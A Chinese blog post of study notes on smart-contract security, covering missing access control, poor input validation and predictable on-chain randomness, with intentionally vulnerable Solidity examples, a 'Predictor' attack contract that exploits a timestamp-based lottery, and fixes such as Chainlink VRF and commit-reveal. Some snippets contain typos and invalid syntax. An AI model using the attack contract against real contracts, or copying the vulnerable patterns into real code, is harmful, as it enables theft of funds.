<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 8.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="访问控制&amp;坏随机数">
<meta property="og:type" content="article">
<meta property="og:title" content="访问控制&amp;坏随机数">
<meta property="og:url" content="http://example.com/2026/05/15/%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6&%E5%9D%8F%E9%9A%8F%E6%9C%BA%E6%95%B0/index.html">
<meta property="og:site_name" content="AUV wordmaya">
<meta property="og:description" content="访问控制&amp;坏随机数">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-05-14T16:00:00.000Z">
<meta property="article:modified_time" content="2026-05-15T02:33:04.818Z">
<meta property="article:author" content="wordmaya">
<meta property="article:tag" content="blockchain">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2026/05/15/%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6&%E5%9D%8F%E9%9A%8F%E6%9C%BA%E6%95%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>访问控制&坏随机数 | AUV wordmaya</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="AUV wordmaya" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">AUV wordmaya</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">玩得开心</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a>

  </li>
        <li class="menu-item menu-item-commonweal">

    <a href="/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>公益 404</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2026/05/15/%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6&%E5%9D%8F%E9%9A%8F%E6%9C%BA%E6%95%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="wordmaya">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="AUV wordmaya">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          访问控制&坏随机数
        </h1>

        <div class="post-meta">
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2026-05-15 00:00:00 / 修改时间：10:33:04" itemprop="dateCreated datePublished" datetime="2026-05-15T00:00:00+08:00">2026-05-15</time>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>4.1k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>4 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>访问控制&amp;坏随机数</p>
<span id="more"></span>

<h1 id="访问控制"><a href="#访问控制" class="headerlink" title="访问控制"></a>访问控制</h1><p>忘记对谁可以调用一个敏感函数进行限制</p>
<ol>
<li>modifier写了，但是没有正确实现(缺少require语句)</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">modifier onlyMinter&#123;</span><br><span class="line">	minters[msg.sender] == true_;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>另一种方式</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">function claimAirdrop(bytes32 calldata proof[]) &#123;</span><br><span class="line"></span><br><span class="line">    bool verified = MerkleProof.verifyCalldata(proof, merkleRoot, keccak256(abi.encode(msg.sender)));</span><br><span class="line">    require(verified, &quot;not verified&quot;);</span><br><span class="line">    require(alreadyClaimed[msg.sender], &quot;already claimed&quot;);</span><br><span class="line"></span><br><span class="line">    _transfer(msg.sender, AIRDROP_AMOUNT);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>require(alreadyClaimed[msg.sender], &quot;already claimed&quot;);</code>是验证用户是否有领取资格，但是因为用户从来没有领取过，所以<code>alreadyClaimed</code>,永远不会为true,领取状态没有被正确记录；反之，领取过的用户可以无限领取</p>
<p>可以修改为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">require(!alreadyClaimed[msg.sender], &quot;already claimed&quot;);//没有领取过的用户才可以进行领取</span><br><span class="line">alreadyClaimed[msg.aender]=true;//状态更新，已成功领取（必须先更新，否则有重入漏洞）</span><br><span class="line">_transfer(msg.sender, AIRDROP_AMOUNT);//转账</span><br></pre></td></tr></table></figure>

<h2 id="输入验证"><a href="#输入验证" class="headerlink" title="输入验证"></a>输入验证</h2><p>控制调用者用什么来调用一个合约</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">contract UnsafeBank &#123;</span><br><span class="line">    mapping(address =&gt; uint256) public balances;</span><br><span class="line"></span><br><span class="line">    // 允许用户给别人充值</span><br><span class="line">    function deposit(address from) public payable &#123;</span><br><span class="line">        balances += msg.value;//违规语法，mapping不能直接加法</span><br><span class="line">      //balance[from] += msg.value;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function withdraw(address from, uint256 amount) public &#123;</span><br><span class="line">        require(balances[from] &gt;= amount, &quot;insufficient balance&quot;);</span><br><span class="line">	//require(balance[msg.sender] &gt;= amount, &quot;insufficient balance&quot;);</span><br><span class="line">        balances[from] -= amount;</span><br><span class="line">      //balances[msg.sender] -= amount;</span><br><span class="line">        msg.sender.call&#123;value: amout&#125;(&quot;&quot;);//没有判断调用者是否有权限从from地址取钱</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>检查了提取金额不超过账户余额，但是没有阻止从任意一个账户提取</p>
<h2 id="不适当访问控制和不适当输入验证区别"><a href="#不适当访问控制和不适当输入验证区别" class="headerlink" title="不适当访问控制和不适当输入验证区别"></a>不适当访问控制和不适当输入验证区别</h2><p>前者意味着msg.sender没有足够的限制</p>
<p>后者意味着函数的参数没有得到充分的处理</p>
<h2 id="过多函数限制"><a href="#过多函数限制" class="headerlink" title="过多函数限制"></a>过多函数限制</h2><p>资金不会被盗，但是资金可能会被锁在合约里</p>
<hr>
<h1 id="坏随机数"><a href="#坏随机数" class="headerlink" title="坏随机数"></a>坏随机数</h1><p>目前区块链不可能用区块链上的单一交易安全的产生随机数，区块链需要是完全确定的，因此这些随机数是完全确定的，都可以被检测到</p>
<p>如<code>block.timestamp</code>,<code>block.number</code>,<code>blockhash</code>,<code>msg.sender</code>,<code>address(this)</code></p>
<p><strong>示例</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: MIT</span><br><span class="line">pragma solidity ^0.8.0;</span><br><span class="line"></span><br><span class="line">contract BadRandom &#123;</span><br><span class="line">    address public winner;</span><br><span class="line">    uint256 public prize = 1 ether;</span><br><span class="line">    mapping(address =&gt; bool) public claimed;</span><br><span class="line"></span><br><span class="line">    constructor() payable &#123;</span><br><span class="line">        require(msg.value == prize, &quot;Must fund 1 ETH prize&quot;);//抽奖系统部署者设置的奖金</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function play() external &#123;</span><br><span class="line">        require(!claimed[msg.sender], &quot;Already claimed&quot;);</span><br><span class="line"></span><br><span class="line">        // ❌ 脆弱随机数：可以预测</span><br><span class="line">        uint256 rand = uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 100;</span><br><span class="line"></span><br><span class="line">        if (rand == 42) &#123;</span><br><span class="line">            winner = msg.sender;//当调用者猜中随机数时，调用者被设为owner</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        claimed[msg.sender] = true;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function claimPrize() external &#123;</span><br><span class="line">        require(msg.sender == winner, &quot;Not winner&quot;);</span><br><span class="line">        payable(msg.sender).transfer(prize);//向winner转奖金</span><br><span class="line">        prize = 0;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>攻击合约</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: MIT</span><br><span class="line">pragma solidity ^0.8.0;</span><br><span class="line"></span><br><span class="line">import &quot;./BadRandom.sol&quot;;</span><br><span class="line"></span><br><span class="line">contract Predictor &#123;</span><br><span class="line">    BadRandom public target;</span><br><span class="line"></span><br><span class="line">    constructor(address _target) payable &#123;</span><br><span class="line">        target = BadRandom(_target);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function predictAndPlay() public &#123;</span><br><span class="line">        // 本合约地址是确定的，timestamp 近似可预测，攻击者链下可以提前预测 rand == 42</span><br><span class="line"></span><br><span class="line">        uint256 rand = uint256(</span><br><span class="line">            keccak256(</span><br><span class="line">                abi.encodePacked(block.timestamp, address(this))</span><br><span class="line">            )</span><br><span class="line">        ) % 100;</span><br><span class="line"></span><br><span class="line">        // 只有满足条件才尝试 play，节省 gas</span><br><span class="line">        if (rand == 42) &#123;</span><br><span class="line">            target.play();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function claim() public &#123;</span><br><span class="line">        target.claimPrize();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    // 提现</span><br><span class="line">    function withdraw() external &#123;</span><br><span class="line">        payable(msg.sender).transfer(address(this).balance);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    receive() external payable &#123;&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>&#x3D;&#x3D;需要控制<code>block.timestamp</code>,使<code>randon==42</code>，然后我就变成owner,从而可以提现&#x3D;&#x3D;</p>
<p>攻击思路</p>
<ul>
<li><p>在攻击合约中计算rand,当rand&#x3D;&#x3D;42的时候再调用<code>play()</code></p>
</li>
<li><p><code>block.timestamp</code>在每个区块是固定的，所以产生了不止一个区块（普通区块，不是空区块），直到满足rand&#x3D;&#x3D;42</p>
</li>
<li><p>此时攻击合约被设为<code>winner</code>,调用<code>claimPrize()</code>,取出奖金</p>
</li>
<li><p>将奖金转给EOA账户</p>
</li>
<li><p>成功</p>
</li>
</ul>
<h2 id="错误使用-Chainlink-随机数-Oracle"><a href="#错误使用-Chainlink-随机数-Oracle" class="headerlink" title="错误使用 Chainlink 随机数 Oracle"></a>错误使用 Chainlink 随机数 Oracle</h2><p>Chainlink是一个流行的解决方案，分两步进行，智能合约向预言机处发一个随机数请求，在一些区块后，预言机以一个随机数作为回应</p>
<ul>
<li>请求随机数的智能合约必须在随机数返回之前不做任何事情</li>
<li>随机数预言机本身可能回试图操纵你的应用程序</li>
</ul>
<p>因为使用预言机需要进行某些链外操作，即使预言机保持诚实，他们的数据来源也可以被操纵。</p>
<p>同样，依赖于传感器数据或一些web2 API 的预言机也会收到传统黑客攻击的影响。</p>
<h2 id="预防措施"><a href="#预防措施" class="headerlink" title="预防措施"></a>预防措施</h2><ol>
<li><p>使用<code>Chainlink VRF</code></p>
<p><code>Chainlink VRF</code>需要拆分流程：请求-&gt;等待回调-&gt;在回调函数内处理结果</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">function fullfillRandomWords(uint256 requestId, uint256[] memory randomWords) internal orride&#123;</span><br><span class="line">	uint256 result = randomWords[0];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ol>
<li>随机数是链下生成，链上回调</li>
<li>每个请求都带有可验证证明</li>
<li>攻击者无法预测或控制结果</li>
</ol>
</li>
<li><p>不依赖<code>block.timestamp</code>,<code>block.number</code>,<code>blockhash</code>,<code>msg.sender</code>,<code>address(this)</code>等</p>
</li>
<li><p>多方生成随机数，每个用户提交一个值，所有值XOR或混合后得到最终随机数(commit-reveal)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">bytes32 commitment = keccak256(abi.encodePacked(secret, user));//secrt是用户的私密随机种子</span><br><span class="line">storeCommitment(user, commitment);</span><br></pre></td></tr></table></figure>

<p>后续</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">require(keccak256(abi.encodePacked(secret, msg.sender)) == storedCommitment[msg.sender]);</span><br></pre></td></tr></table></figure>

<p>最后由产生的随机数决定获胜者</p>
</li>
<li><p>不在同一交易中完成随机数生成与敏感状态修改</p>
</li>
</ol>

    </div>

    
    
    
    
      <div>
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:24px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>

      </div>
    
        <div class="reward-container">
  <div>KFC V我 50</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.png" alt="wordmaya 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.png" alt="wordmaya 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>wordmaya
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2026/05/15/%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6&%E5%9D%8F%E9%9A%8F%E6%9C%BA%E6%95%B0/" title="访问控制&amp;坏随机数">http://example.com/2026/05/15/访问控制&坏随机数/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/blockchain/" rel="tag"># blockchain</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/05/15/%E9%9B%86%E4%B8%AD%E6%B5%81%E5%8A%A8%E6%80%A7/" rel="prev" title="UniswapV3">
      <i class="fa fa-chevron-left"></i> UniswapV3
    </a></div>
      <div class="post-nav-item">
    <a href="/2026/05/15/x402&ERC-8004&ERC-4337&ERC-7962/" rel="next" title="Web4">
      Web4 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6"><span class="nav-number">1.</span> <span class="nav-text">访问控制</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BE%93%E5%85%A5%E9%AA%8C%E8%AF%81"><span class="nav-number">1.1.</span> <span class="nav-text">输入验证</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8D%E9%80%82%E5%BD%93%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E5%92%8C%E4%B8%8D%E9%80%82%E5%BD%93%E8%BE%93%E5%85%A5%E9%AA%8C%E8%AF%81%E5%8C%BA%E5%88%AB"><span class="nav-number">1.2.</span> <span class="nav-text">不适当访问控制和不适当输入验证区别</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BF%87%E5%A4%9A%E5%87%BD%E6%95%B0%E9%99%90%E5%88%B6"><span class="nav-number">1.3.</span> <span class="nav-text">过多函数限制</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9D%8F%E9%9A%8F%E6%9C%BA%E6%95%B0"><span class="nav-number">2.</span> <span class="nav-text">坏随机数</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%94%99%E8%AF%AF%E4%BD%BF%E7%94%A8-Chainlink-%E9%9A%8F%E6%9C%BA%E6%95%B0-Oracle"><span class="nav-number">2.1.</span> <span class="nav-text">错误使用 Chainlink 随机数 Oracle</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%84%E9%98%B2%E6%8E%AA%E6%96%BD"><span class="nav-number">2.2.</span> <span class="nav-text">预防措施</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="wordmaya"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">wordmaya</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">42</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/zg870" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;zg870" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="link fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://chat.openai.com/" title="https:&#x2F;&#x2F;chat.openai.com&#x2F;" rel="noopener" target="_blank">ChatGPT</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.baidu.com/" title="https:&#x2F;&#x2F;www.baidu.com&#x2F;" rel="noopener" target="_blank">百度</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">wordmaya</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">336k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">5:06</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>
<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共79k字</span>
</div>


    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客数<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>
<!-- 不蒜子计数初始值纠正 -->
<script>
$(document).ready(function() {

    var int = setInterval(fixCount, 50);  // 50ms周期检测函数
    var countOffset = 20000;  // 初始化首次数据

    function fixCount() {            
       if (document.getElementById("busuanzi_container_site_pv").style.display != "none")
        {
            $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + countOffset); 
            clearInterval(int);
        }                  
        if ($("#busuanzi_container_site_pv").css("display") != "none")
        {
            $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + countOffset); // 加上初始数据 
            clearInterval(int); // 停止检测
        }  
    }
       
});
</script> 

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

  

</body>
</html>
